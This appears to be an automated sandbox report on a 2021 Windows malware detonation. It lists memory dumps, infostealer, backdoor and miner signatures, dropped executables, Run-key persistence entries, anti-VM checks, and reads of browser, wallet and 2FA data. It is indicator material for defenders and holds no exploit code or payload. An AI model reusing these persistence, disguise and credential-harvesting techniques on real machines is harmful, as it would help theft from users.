memory/4576-313-0x0000000000000000-mapping.dmp

memory/4468-314-0x0000000004760000-0x0000000004790000-memory.dmp

memory/4276-312-0x0000000000400000-0x0000000002B5D000-memory.dmp

memory/4576-315-0x00000000009E0000-0x00000000009E1000-memory.dmp

memory/4468-322-0x0000000000400000-0x0000000002B6D000-memory.dmp

memory/4576-323-0x0000000005360000-0x0000000005361000-memory.dmp

memory/4468-325-0x0000000007280000-0x0000000007281000-memory.dmp

memory/4468-330-0x0000000007284000-0x0000000007286000-memory.dmp

memory/4468-329-0x0000000007283000-0x0000000007284000-memory.dmp

memory/4468-327-0x0000000007282000-0x0000000007283000-memory.dmp

memory/2724-333-0x0000000000000000-mapping.dmp

memory/4680-336-0x0000000000000000-mapping.dmp

memory/4048-338-0x0000000000000000-mapping.dmp

memory/4256-337-0x0000000000000000-mapping.dmp

memory/4484-335-0x0000000000000000-mapping.dmp

memory/2724-349-0x0000000000400000-0x0000000000414000-memory.dmp

memory/5080-350-0x0000000000000000-mapping.dmp

memory/1792-348-0x0000000000000000-mapping.dmp

memory/2768-378-0x00000255D1BD0000-0x00000255D1C44000-memory.dmp

memory/2264-376-0x000000007EC00000-0x000000007EC01000-memory.dmp

memory/5080-372-0x0000000004DC0000-0x0000000004E52000-memory.dmp

memory/4604-370-0x00007FF6C4C54060-mapping.dmp

memory/4484-368-0x00000000012C0000-0x00000000012C2000-memory.dmp

memory/1792-382-0x0000000004671000-0x0000000004772000-memory.dmp

memory/4852-390-0x000000000041C5EE-mapping.dmp

memory/4256-396-0x0000000004C30000-0x0000000004C31000-memory.dmp

memory/3984-399-0x00000236A68A0000-0x00000236A68ED000-memory.dmp

memory/3984-402-0x00000236A7040000-0x00000236A70B4000-memory.dmp

memory/2460-403-0x000001EE50C80000-0x000001EE50CF4000-memory.dmp

memory/4668-398-0x0000000000000000-mapping.dmp

memory/1792-392-0x0000000004780000-0x00000000047DF000-memory.dmp

memory/1004-389-0x000001F09AA60000-0x000001F09AAD4000-memory.dmp

memory/4792-387-0x0000000000000000-mapping.dmp

memory/4604-386-0x0000013700400000-0x0000013700474000-memory.dmp

memory/1960-384-0x0000000000000000-mapping.dmp

memory/2424-420-0x0000019BBD240000-0x0000019BBD2B4000-memory.dmp

memory/1296-423-0x0000017A2A040000-0x0000017A2A0B4000-memory.dmp

memory/2264-424-0x0000000004923000-0x0000000004924000-memory.dmp

memory/1096-427-0x0000023B65BB0000-0x0000023B65C24000-memory.dmp

memory/1764-430-0x000002BBBC400000-0x000002BBBC474000-memory.dmp

memory/4668-429-0x00000000053F0000-0x00000000053F1000-memory.dmp

memory/932-431-0x000001FC3E7D0000-0x000001FC3E844000-memory.dmp

memory/4852-433-0x0000000005420000-0x0000000005A26000-memory.dmp

memory/5216-448-0x0000000000000000-mapping.dmp

memory/1136-456-0x0000024D34760000-0x0000024D347D4000-memory.dmp

memory/1344-457-0x000001BAFF2A0000-0x000001BAFF314000-memory.dmp

memory/2688-463-0x000002856FB70000-0x000002856FBE4000-memory.dmp

memory/2660-459-0x000002271FB00000-0x000002271FB74000-memory.dmp

memory/5536-484-0x0000000000000000-mapping.dmp

memory/5888-525-0x0000000000000000-mapping.dmp

memory/6128-537-0x0000000000000000-mapping.dmp

memory/1792-545-0x0000000000000000-mapping.dmp

memory/3044-546-0x0000000000000000-mapping.dmp

memory/5372-547-0x0000000000000000-mapping.dmp

memory/5432-549-0x0000000000000000-mapping.dmp

memory/5440-550-0x0000000000000000-mapping.dmp

memory/5372-551-0x0000000000400000-0x0000000000416000-memory.dmp

memory/5440-563-0x00000000001E0000-0x00000000001E1000-memory.dmp

memory/5472-562-0x0000000002E90000-0x0000000002E92000-memory.dmp

memory/5320-565-0x0000000002E90000-0x0000000002E92000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2021-09-11 20:41

Reported

2021-09-11 21:12

Platform

win10-fr

Max time kernel

1810s

Max time network

1778s

Command Line

c:\windows\system32\svchost.exe -k netsvcs -s Schedule

Signatures

Modifies system executable filetype association

persistence
Description Indicator Process Target
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe

RedLine

infostealer redline

RedLine Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Registers COM server for autorun

persistence

ServHelper

trojan backdoor servhelper

SmokeLoader

trojan backdoor smokeloader

Socelars

stealer socelars

Socelars Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 5624 created 6664 N/A \??\c:\windows\system32\svchost.exe C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe

Vidar

stealer vidar

xmrig

miner xmrig

Checks for common network interception software

evasion

Grants admin privileges

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\is-R01AG.tmp\46807GHF____.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat1946eb84e6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19e4750dd01.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat196ac06a9e6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat199ba8a4637dcb034.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19ba05e89ea6d406.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat191649b47c9e2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19f84b58b3d7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19e6a852f849bb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19c6762a08beae.exe N/A
N/A N/A C:\ProgramData\820992.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\ProgramData\4916599.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-24343.tmp\Sat19ba05e89ea6d406.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe N/A
N/A N/A C:\ProgramData\889030.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\udptest.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_2.exe N/A
N/A N/A C:\ProgramData\5295645.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3002.exe N/A
N/A N/A C:\ProgramData\6848594.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-R01AG.tmp\46807GHF____.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-UDHJP.tmp\setup_2.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jhuuee.exe N/A
N/A N/A C:\ProgramData\889030.exe N/A
N/A N/A C:\ProgramData\928377.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe N/A
N/A N/A C:\ProgramData\1860007.exe N/A
N/A N/A C:\ProgramData\3782043.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_2.exe N/A
N/A N/A C:\ProgramData\3510382.exe N/A
N/A N/A C:\ProgramData\5898233.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\ProgramData\1860007.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3002.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-FJS9H.tmp\postback.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE N/A
N/A N/A C:\Program Files\Java\SPLXFNRHQQ\ultramediaburner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\60-a6f67-ece-0febc-549e9c64ccfa7\Qelaecejuca.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eb-f287e-293-8ee97-a656dd53ac63e\Fokifyfulo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-EO9SV.tmp\ultramediaburner.tmp N/A
N/A N/A C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EtGb23GfX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\coro104b.gxq\GcleanerEU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\oxrgytmr.42q\anyname.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vmguzdvf.xe4\gcleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\6OvxjtPJ9.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9T0OnGIGy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8752.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bf4dexN5Nl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CC3D.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe N/A

Modifies RDP port number used by Windows

Sets DLL path for service in the registry

persistence

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\8752.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\8752.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\60-a6f67-ece-0febc-549e9c64ccfa7\Qelaecejuca.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-24343.tmp\Sat19ba05e89ea6d406.tmp N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-UDHJP.tmp\setup_2.tmp N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19e6a852f849bb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19e6a852f849bb2.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EtGb23GfX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EtGb23GfX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Windows\system32\wbem\wmiprvse.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CC3D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CC3D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CC3D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CC3D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CC3D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.160.0808.0002\FileSyncConfig.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses 2FA software files, possible credential harvesting

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" C:\ProgramData\4916599.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Portable Devices\\Vozhaelujeci.exe\"" C:\Users\Admin\AppData\Local\Temp\is-R01AG.tmp\46807GHF____.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\"" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Standalone Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe\"" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\8752.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #2 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #4 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\User_Feed_Synchronization-{4F246605-F333-40E5-8FE6-2ED3621ADF90} c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-2559286294-2439613352-4032193287-1000 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #1 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Azure-Update-Task c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\services64 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\AdvancedUpdater c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #3 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #6 c:\windows\system32\svchost.exe N/A
File created C:\Windows\SysWOW64\rdpclip.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent A073DC6DBE1CBD72 c:\windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #5 c:\windows\system32\svchost.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8752.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
